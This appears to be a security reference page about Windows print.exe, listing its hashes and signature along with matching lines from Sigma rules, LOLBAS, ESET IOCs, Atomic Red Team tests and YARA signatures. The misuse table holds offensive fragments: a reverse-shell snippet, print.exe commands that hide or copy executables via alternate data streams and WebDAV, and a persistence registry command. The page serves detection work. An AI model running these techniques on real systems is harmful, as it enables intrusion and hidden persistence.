print.exe

  • File Path: C:\WINDOWS\SysWOW64\print.exe
  • Description: Print Utility

Hashes

Type Hash
MD5 5E725A5CB5FFDEE7557B57DCA71D8A13
SHA1 5D613386D49B39B37212C52BAE0E7A5CB11714B8
SHA256 DFA124AE202A2A3F758CD4B9FDB5EEB2EEAEE0F7827FE81675524DA93176E7E8
SHA384 58F2C30AED7A93FBDC40BBBB960BE265B1A7BFB7A57EB1F4EC0787E74E74242EEED007AC5EA7FC185E318334825D0498
SHA512 3E7BEC0462FC5C5661911BDD95BD1175DD72527C91832276F2D4C79E884CBDE8F16730780C842DAD6AF2C1D0374E3D3C0AAE609B1DE485FEB74436B823A1BA47
SSDEEP 192:R6/s6GrBaX6BWOaFZZyftKlcG1jv/kecPliZLliVYgabSgBk1WMUWen:4/3sBaXMN6nkeWloLlYaK1WMUWk
IMP EC8AF21EA60135BB82EBEBEAF1752064
PESHA1 8B82BD59D8E3AA41454ACA04A5310A491A9C4FC2
PE256 82038B8BF7525FC3643BFBB6DAD42D7CCF5DC640A0FDE9EB2D15E618115E898C

Runtime Data

Usage (stdout):

Prints a text file.

PRINT [/D:device] [[drive:][path]filename[...]]

   /D:device   Specifies a print device.


Loaded Modules:

Path
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\System32\wow64.dll
C:\WINDOWS\System32\wow64base.dll
C:\WINDOWS\System32\wow64con.dll
C:\WINDOWS\System32\wow64cpu.dll
C:\WINDOWS\System32\wow64win.dll
C:\WINDOWS\SysWOW64\print.exe

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: Print.Exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.1 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/73
  • VirusTotal Link: https://www.virustotal.com/gui/file/dfa124ae202a2a3f758cd4b9fdb5eeb2eeaee0f7827fe81675524da93176e7e8/detection

Possible Misuse

The following table contains possible examples of print.exe being misused. While print.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma av_printernightmare_cve_2021_34527.yml description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 . DRL 1.0
sigma lnx_shell_susp_rev_shells.yml - ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print' DRL 1.0
sigma zeek_dce_rpc_printnightmare_print_driver_install.yml title: Possible PrintNightmare Print Driver Install DRL 1.0
sigma zeek_dce_rpc_printnightmare_print_driver_install.yml Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). DRL 1.0
sigma zeek_dce_rpc_printnightmare_print_driver_install.yml The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy. DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler.yml title: Possible CVE-2021-1675 Print Spooler Exploitation DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler.yml description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675 DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler.yml - 'The print spooler failed to load a plug-in module' DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler_operational.yml title: CVE-2021-1675 Print Spooler Exploitation DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler_operational.yml description: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler_security.yml title: CVE-2021-1675 Print Spooler Exploitation IPC Access DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler_security.yml description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527 DRL 1.0
sigma file_event_win_cve_2021_1675_printspooler.yml title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern DRL 1.0
sigma file_event_win_cve_2021_1675_printspooler.yml description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 DRL 1.0
sigma proc_creation_win_susp_print.yml title: Abusing Print Executable DRL 1.0
sigma proc_creation_win_susp_print.yml description: Attackers can use print.exe for remote file copy DRL 1.0
sigma proc_creation_win_susp_print.yml - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Print.yml DRL 1.0
sigma proc_creation_win_susp_print.yml - \print.exe DRL 1.0
sigma proc_creation_win_susp_print.yml - print DRL 1.0
sigma proc_creation_win_susp_print.yml - print.exe DRL 1.0
sigma proc_creation_win_susp_spoolsv_child_processes.yml description: Detects suspicious print spool service (spoolsv.exe) child processes. DRL 1.0
sigma proc_creation_win_susp_spoolsv_child_processes.yml - https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md DRL 1.0
sigma registry_event_add_port_monitor.yml TargetObject|startswith: 'HKLM\System\CurrentControlSet\Control\Print\Monitors\' DRL 1.0
sigma registry_event_add_port_monitor.yml TargetObject|contains: '\System\CurrentControlSet\Control\Print\Monitors\CutePDF Writer Monitor v4.0\Driver' DRL 1.0
sigma registry_event_asep_reg_keys_modification.yml - '\Print\Providers' DRL 1.0
sigma registry_event_asep_reg_keys_modification.yml - '\Print\Monitors' DRL 1.0
sigma registry_event_asep_reg_keys_modification_currentcontrolset.yml - '\Print\Providers' DRL 1.0
sigma registry_event_asep_reg_keys_modification_currentcontrolset.yml - '\Print\Monitors' DRL 1.0
sigma registry_event_asep_reg_keys_modification_currentcontrolset.yml TargetObject|contains: '\Print\Monitors\CutePDF Writer Monitor' DRL 1.0
sigma registry_event_mimikatz_printernightmare.yml - '\Control\Print\Environments\Windows x64\Drivers\Version-3\QMS 810\' DRL 1.0
sigma registry_event_mimikatz_printernightmare.yml - '\Control\Print\Environments\Windows x64\Drivers\Version-3\mimikatz' DRL 1.0
sigma registry_event_mimikatz_printernightmare.yml - '\Control\Print\Environments\Windows' DRL 1.0
sigma registry_event_mimikatz_printernightmare.yml - '\Control\Print\Environments' DRL 1.0
sigma registry_event_mimikatz_printernightmare.yml - '\CurrentVersion\Print\Printers' DRL 1.0
sigma registry_event_susp_printer_driver.yml - '\Control\Print\Environments\Windows x64\Drivers' DRL 1.0
LOLBAS Print.yml Name: Print.exe
LOLBAS Print.yml - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
LOLBAS Print.yml - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
LOLBAS Print.yml - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
LOLBAS Print.yml - Path: C:\Windows\System32\print.exe
LOLBAS Print.yml - Path: C:\Windows\SysWOW64\print.exe
LOLBAS Print.yml - IOC: Print.exe retrieving files from internet
LOLBAS Print.yml - IOC: Print.exe creating executable files on disk
LOLBAS Mshtml.yml Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box).
malware-ioc deprimon https://www.welivesecurity.com/2019/11/21/deprimon-default-print-monitor-malicious-downloader/[WeLiveSecurity]. © ESET 2014-2018
malware-ioc deprimon [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Windows Default Print Monitor] © ESET 2014-2018
malware-ioc nouns.txt print © ESET 2014-2018
malware-ioc mumblehard under the Perl interpreter. The following command ran as root will print the © ESET 2014-2018
malware-ioc mumblehard ps -ef | grep -e ' httpd$' -e ' mail$' -e ' init$' | awk '{print $2}' | xargs -I '{}' ls -l '/proc/{}/exe' | grep perl | cut -d/ -f 3 © ESET 2014-2018
malware-ioc 2020_Q4 HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\BcastDVRUserService_6d67d\Driver © ESET 2014-2018
malware-ioc 2020_Q4 HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\BcastDVRUserService_3c628o\Driver © ESET 2014-2018
malware-ioc 2020_Q4 HKLM\SOFTWARE\Microsoft\Print\Components\Spooler-PPC\{94E5H6D48A-P895-85E1-54DD-080636B11A03} © ESET 2014-2018
malware-ioc 2020_Q4 HKLM\SOFTWARE\Microsoft\Print\Components\Spooler-PPC\{38C8D238Q-923C-D782-9B8J-829263CD85C9} © ESET 2014-2018
malware-ioc vf_ioc_linux_rakos.py print("Suspected PID: {0:8s} {1:<16}:{2:>5} {3:<16}:{4:>5} {5:<15s} {6:>17s}/{7:<5d}\n".format(proto, saddr, sport, daddr, dport, state, task.comm, task.pid)) © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_str_ : "; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "$f : crypted, skip\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print $fc. "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_ssh: \n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd1: '$sd[1]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc1: '$sc[1]':'$sc[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd1a: file:'$sd[4]'; hash:'$sd[15]'; cvs:'$sd[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd2: '$sd[1]':'$sd[2]':'$sd[3]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc4: '$sc[1]':'$sc[0]'\n" if @sc and f $sc[1]; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd4: '$sd[0]':'$sd[1]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd5: " . join( '|', @sd ) . "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd6: '$sd[2]':'$sd[0]'\nmod_sshc6: '$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd7: '$sd[0]':'$sd[4]'\nmod_sshc7: '$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd8: '$sd[1]':'$sd[2]'\nmod_sshc8: '$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print © ESET 2014-2018
malware-ioc windigo_signatures.pl if (@sd) { print "mod_sshd12: GET, no params"; ssh_ls() } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd14: hash:'$sd[3]':'$sd[4]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc14: hash:'$sd[3]':'$sd[4]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl else { print "mod_sshd14: unknown hash; fpass:'$sd[1]';'$sd[3]'\n" } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod14p: $d\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd15: '$sd[0]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc15: '$sc[38]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd16: '$sd[0]':'$sd[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc16: '$sc[1]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd17: crypt:'$sd[2]':'$sd[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc17: '$sc[0]':'$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd17: client_string:'$q[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd18: md5:'$sd[3]':'$sd[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc18: md5:'$sc[3]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd19: '$sd[0]':'$sd[1]' url:'$sd[5] '$sd[4]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd20: '$sd[0]':'$sd[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc20: '$sc[0]':'$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd21: '$sd[0]' mod_sshc21: '$sc[0]':'$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc22: '$sd[0]':'$sd[1]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd23: '$sd[2]':'$sd[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc23: '$sc[0]':'$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd24: '$sd[0]':'$sd[17]':'$sd[18]:$sd[20]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc24: '$sc[1]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd25: '$sd[2]':'$sd[0]' mod_sshc25: '$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd27: '$sd[0]':'$sd[2]':'$sd[1]'\nmod_sshc27: '$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd31: hash:'$sd[2]':'$sd[1]':'$sd[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd32: md5:'$sd1[0]:'$sd[0]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd33: '$sd[0]':'$sd[1]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print $q. "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd36: md5:'$sd[0]':'$sc[0]'; '$sd[1]':'$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd37: md5:'$sd[0]'; '$sd[1]':'$sd[3]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl while (<$fn>) { chomp; print $_ ^ "\x14" x length $_ } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_ssh41_cstr: " . join( '|', sort keys %ostr ) . "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd41: '$sd[1]' '$sd[0]', crypted\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc41: '$sc[1]' '$sc[0]', crypted\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd42: detected; log_useragent:passwd_file:passwd\n" if @sd; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc42: detected\n" if @sc; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd44: pass:'$sd[1]' '$sd[0]', '$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl if ( $sc[0] ) { print "mod_sshc44: '$sc[0]' '$sc[13]'\n"; ssh_ls( $sd[0] ) } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd45: pass:'$sd[1]' host:'$sd[0]', '$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl if ( $sc[0] ) { print "mod_sshc45: host:'$sc[0]' '$sc[1]'\n"; ssh_ls() } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd46: crypt:'$sc[1]' v1:'$sd[1]' v2:'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd47: pass:'$sd[0]' '$sd[1]', '$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl if (@sc) { print "mod_sshc47: host:'$sc[0]' '$sc[-1]'\n"; ssh_ls( $sc[0] ) } © ESET 2014-2018
malware-ioc windigo_signatures.pl for (@sd) { print "mod_md5_sshd: '$_'\n" } © ESET 2014-2018
malware-ioc windigo_signatures.pl for (@sc) { print "mod_md5_ssh: '$_'\n" } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_md5_static_ssl: $static_ssl\n" if $static_ssl; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_hack_strd: possible hacked, " . join( "|", @sd ) . "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_hack_strc: possible hacked, " . join( "|", @sc ) . "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl for (@sd) { print "mod_md5_sshd1: '$_'\n" } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_str_sshd_str: '" . join( "':'", keys %ostr ) . "'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_str_sshd_str1: '" . join( "':'", keys %ostr ) . "'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl if (@sd) { print "sshd_str: " . join( '|', @sd ) . "\n" } © ESET 2014-2018
malware-ioc windigo_signatures.pl if (@sc) { print "sshc_str: " . join( '|', @sc ) . "\n" } © ESET 2014-2018
malware-ioc turla ** ResultQueue::print © ESET 2014-2018
malware-ioc turla ** TaskQueue::print © ESET 2014-2018
malware-ioc windigo print the dynamic section of the ELF header. Anything NEEDED (type 1) other © ESET 2014-2018
malware-ioc windigo OpenSSH version 6.7 or earlier. A clean server will print © ESET 2014-2018
malware-ioc windigo to stderr but an infected server will only print the usage (note the missing © ESET 2014-2018
malware-ioc windigo yields no output if one is not infected and would print a filename if one is. © ESET 2014-2018
malware-ioc windigo ps -ef | grep crond | grep -v grep | awk '{print $2}' © ESET 2014-2018
malware-ioc winnti_group HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\PrintFiiterPipelineSvc\Driver = DEment.dll © ESET 2014-2018
malware-ioc winnti_group HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\lltdsvc1\Driver = EntAppsvc.dll © ESET 2014-2018
malware-ioc winnti_group HKLM\SOFTWARE\Microsoft\Print\Components\DC20FD7E-4B1B-4B88-8172-61F0BED7D9E8 © ESET 2014-2018
malware-ioc winnti_group HKLM\SOFTWARE\Microsoft\Print\Components\A66F35-4164-45FF-9CB4-69ACAA10E52D © ESET 2014-2018
atomic-red-team index.md - T1547.012 Print Processors CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1547.012 Print Processors CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Outlook Forms CONTRIBUTE A TEST | Print Processors CONTRIBUTE A TEST | Impair Defenses CONTRIBUTE A TEST | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Print Processors CONTRIBUTE A TEST | Services File Permissions Weakness CONTRIBUTE A TEST | Masquerade Task or Service | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Password Filter DLL | Print Processors CONTRIBUTE A TEST | Indicator Removal from Tools CONTRIBUTE A TEST | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Print Processors CONTRIBUTE A TEST | Security Support Provider | Mark-of-the-Web Bypass | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1016.md if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi; MIT License. © 2018 Red Canary
atomic-red-team T1018.md Upon successful execution, cmd.exe will execute net.exe view and display results of local systems on the network that have file and print sharing enabled. MIT License. © 2018 Red Canary
atomic-red-team T1018.md adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} MIT License. © 2018 Red Canary
atomic-red-team T1027.004.md Upon execution, the exe will print 'T1027.004 Dynamic Compile'. MIT License. © 2018 Red Canary
atomic-red-team T1036.006.md 1. echo '#!/bin/bash\necho "print "hello, world!"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt MIT License. © 2018 Red Canary
atomic-red-team T1059.003.md - Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing MIT License. © 2018 Red Canary
atomic-red-team T1059.003.md ## Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing MIT License. © 2018 Red Canary
atomic-red-team T1059.003.md It is designed to mimic BlackByte ransomware’s print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. MIT License. © 2018 Red Canary
atomic-red-team T1059.003.md | max_to_print | The maximum number of Wordpad windows the test will open/print. | String | 75| MIT License. © 2018 Red Canary
atomic-red-team T1059.003.md ##### Description: File to print must exist on disk at specified location (#{file_to_print}) MIT License. © 2018 Red Canary
atomic-red-team T1082.md in order simply print the recon results to the screen as opposed to exfiltrating them. Script. MIT License. © 2018 Red Canary
atomic-red-team T1083.md cd $HOME && find . -print | sed -e 's;[^/]*/;|;g;s;|; |;g' > #{output_file} MIT License. © 2018 Red Canary
atomic-red-team T1110.003.md This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like “[*] username:password”, whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. MIT License. © 2018 Red Canary
atomic-red-team T1127.001.md Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print “Hello From a Code Fragment” and “Hello From a Class.” to the screen. MIT License. © 2018 Red Canary
atomic-red-team T1127.001.md Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print “Hello from a Visual Basic inline task!” to the screen. MIT License. © 2018 Red Canary
atomic-red-team T1140.md | message | Message to print to the screen | String | Hello from Atomic Red Team test T1140!| MIT License. © 2018 Red Canary
atomic-red-team T1140.md ENCODED=$(python3 -c 'import base64;enc=base64.b64encode("#{message}".encode());print(enc.decode())') MIT License. © 2018 Red Canary
atomic-red-team T1140.md python3 -c "import base64;dec=base64.b64decode("$ENCODED");print(dec.decode())" MIT License. © 2018 Red Canary
atomic-red-team T1140.md python3 -c "import base64 as d;dec=d.b64decode("$ENCODED");print(dec.decode())" MIT License. © 2018 Red Canary
atomic-red-team T1140.md python3 -c "from base64 import b64decode;dec=b64decode("$ENCODED");print(dec.decode())" MIT License. © 2018 Red Canary
atomic-red-team T1140.md python3 -c "from base64 import b64decode as d;dec=d("$ENCODED");print(dec.decode())" MIT License. © 2018 Red Canary
atomic-red-team T1140.md echo $ENCODED | python3 -c "import base64,sys;dec=base64.b64decode(sys.stdin.read());print(dec.decode())" MIT License. © 2018 Red Canary
atomic-red-team T1140.md echo $ENCODED > #{encoded_file} && python3 -c "import base64;dec=base64.b64decode(open('#{encoded_file}').read());print(dec.decode())" MIT License. © 2018 Red Canary
atomic-red-team T1140.md ENCODED=$(perl -e "use MIME::Base64;print(encode_base64('#{message}'));") MIT License. © 2018 Red Canary
atomic-red-team T1140.md perl -le "use MIME::Base64;print(decode_base64('$ENCODED'));" MIT License. © 2018 Red Canary
atomic-red-team T1140.md echo $ENCODED | perl -le 'use MIME::Base64;print(decode_base64());' MIT License. © 2018 Red Canary
atomic-red-team T1140.md echo $ENCODED > #{encoded_file} && perl -le 'use MIME::Base64;open($f,"<","#{encoded_file}");print(decode_base64(<$f>));' MIT License. © 2018 Red Canary
atomic-red-team T1485.md dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes MIT License. © 2018 Red Canary
atomic-red-team T1489.md Stops a specified service using the net.exe command. Upon execution, if the service was running “The Print Spooler service was stopped successfully.” MIT License. © 2018 Red Canary
atomic-red-team T1489.md will be displayed. If the service was not running, “The Print Spooler service is not started.” will be displayed and it can be MIT License. © 2018 Red Canary
atomic-red-team T1518.md /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist MIT License. © 2018 Red Canary
atomic-red-team T1518.md /usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist MIT License. © 2018 Red Canary
atomic-red-team T1546.001.md * HKEY_CLASSES_ROOT\txtfile\shell\print\command MIT License. © 2018 Red Canary
atomic-red-team T1547.010.md <blockquote>Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. MIT License. © 2018 Red Canary
atomic-red-team T1547.010.md reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ MIT License. © 2018 Red Canary
atomic-red-team T1547.010.md reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 MIT License. © 2018 Red Canary
atomic-red-team T1562.004.md Print the last 10 lines of the Uncomplicated Firewall (UFW) log file MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe MIT License. © 2018 Red Canary
signature-base apt_backdoor_ssh_python.yar $s1 = "print '[-] (Failed to load moduli -- gex will be unsupported.)'" fullword ascii CC BY-NC 4.0
signature-base apt_backdoor_ssh_python.yar $s2 = "print '[-] Listen/bind/accept failed: ' + str(e)" fullword ascii CC BY-NC 4.0
signature-base apt_backdoor_ssh_python.yar $s4 = "print '[-] SSH negotiation failed.'" fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $x2 = "print "Gimme hex: ";" fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s3 = "print "$hex in decimal=$dec\n\n";" fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s2 = "print "ERROR: the filename or hex representation needs to be one argument try using \"'s\n";" fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s5 = "print hextoIP($ARGV[0]);" fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s2 = "print >>out, "%s%04x " % (lead,i)," fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s3 = "print >>out, "%02X" % ord(x[i+j])," fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s4 = "print >>out, sane(x[i:i+16])" fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s1 = "print "[+] Connecting to %s:%s" % (self.params.dst['ip'], self.params.dst['port'])" fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s6 = "print "[-] keyboard interrupt before response received"" fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s8 = "print 'Debug info ','='*40" fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp_apr17.yar $s2 = "print "java -jar jscanner.jar$scanth$list\n";" fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp_apr17.yar $x1 = "print ' -s storebin use storebin as the Store executable\n'" fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp_apr17.yar $x3 = "print ' -k keyfile the key text file to inject'" fullword ascii CC BY-NC 4.0
signature-base apt_op_wocao.yar $a = "out.print("All seems fine.");" CC BY-NC 4.0
signature-base apt_op_wocao.yar $e = "out.print((char)c);}in.close()" CC BY-NC 4.0
signature-base apt_op_wocao.yar $f = "out.print((char)c);}er.close()" CC BY-NC 4.0
signature-base apt_project_sauron_extras.yar $s2 = "Print only replying Ips" CC BY-NC 4.0
signature-base apt_pulsesecure.yar $s3 = /if[\x09\x20]{0,32}(CGI::param([\x22\x27]\w{1,64}[\x22\x27]))\s{0,128}{[\x09\x20]{0,32}print [\x22\x27]Cache-Control: no-cache\n[\x22\x27][\x09\x20]{0,32};\s{0,128}print [\x22\x27]Content-type: text\/html\n\n[\x22\x27][\x09\x20]{0,32};\s{0,128}my $\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}CGI::param([\x22\x27]\w{1,64}[\x22\x27])[\x09\x20]{0,32};\s{0,128}system([\x22\x27]$/ CC BY-NC 4.0
signature-base apt_pulsesecure.yar $s4 = /sed -i [^\r\n]{1,128}CGI::param([^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Cache-Control: no-cache[^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Content-type: text\/html[^\r\n]{1,128}my [^\r\n]{1,128}=[\x09\x20]{0,32}CGI::param([^\r\n]{1,128}system(/ CC BY-NC 4.0
signature-base apt_pulsesecure.yar $r3 = /if[\x09\x20]{0,32}($\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27]\w{1,64}[\x22\x27])\s{0,128}{\s{1,128}print[\x09\x20]{0,32}[\x22\x27]Content-type/ CC BY-NC 4.0
signature-base apt_pulsesecure.yar $s4 = "print $_" CC BY-NC 4.0
